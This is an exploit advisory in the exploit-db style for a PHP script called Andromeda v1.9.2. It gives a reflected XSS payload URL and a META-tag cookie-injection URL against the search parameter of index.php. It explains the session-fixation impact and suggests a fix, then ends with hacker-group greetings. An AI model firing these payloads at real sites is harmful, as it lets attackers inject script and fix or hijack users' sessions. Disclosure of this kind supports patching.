========================================================================================                  
| # Title    : Andromeda v1.9.2 Mullti Vulnerability            
| # Author   : indoushka                                                               
| # email    : indoushka@dgsn.dz                                                   
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                              |
| # Web Site :                                                                                                                                   
| # Script   : powered by ZIKRENOOR.COM version v1.9.2 PHP. ©2010 SalamHosting.Com, ZIKRENOOR.COM.     
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : Mullti    
|                                                                  
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1- XSS :
 
http://127.0.0.1/Andromeda.v1.9.2-/index.php?q=s&sm=fo&s=<img+src=http://127.0.0.1/1.JPG+onload=alert(00213771818860)>
 
 2- Cookie manipulation :
 
 Vulnerability description:
 
This script is vulnerable to Cookie manipulation attacks.

By injecting a custom HTTP header or by injecting a META tag, it is possible to alter the cookies stored in the browser. Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site.
Affected items
/Andromeda.v1.9.2-/index.php 

Attack details:
The GET variable s has been set to <meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>.

http://127.0.0.1/Andromeda.v1.9.2-/index.php?q=s&sm=fo&s=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>

The impact of this vulnerability
By exploiting this vulnerability, an attacker may conduct a session fixation attack. In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server, thereby eliminating the need to obtain the user's session ID afterwards.

How to fix this vulnerability:

You need to filter the output in order to prevent the injection of custom HTTP headers or META tags. Additionally, with each login the application should provide a new session ID to the user.

Dz-Ghost Team ===== Saoucha * Star08 * Redda * n2n * XproratiX ==========================================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (Tinjah.com) * Yashar (sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com)
www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r IntRue (avengers team)
www.hacker.ps * no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net 
www.alkrsan.net * www.kadmiwe.net * www.arhack.net   
--------------------------------------------------------------------------------------------------------------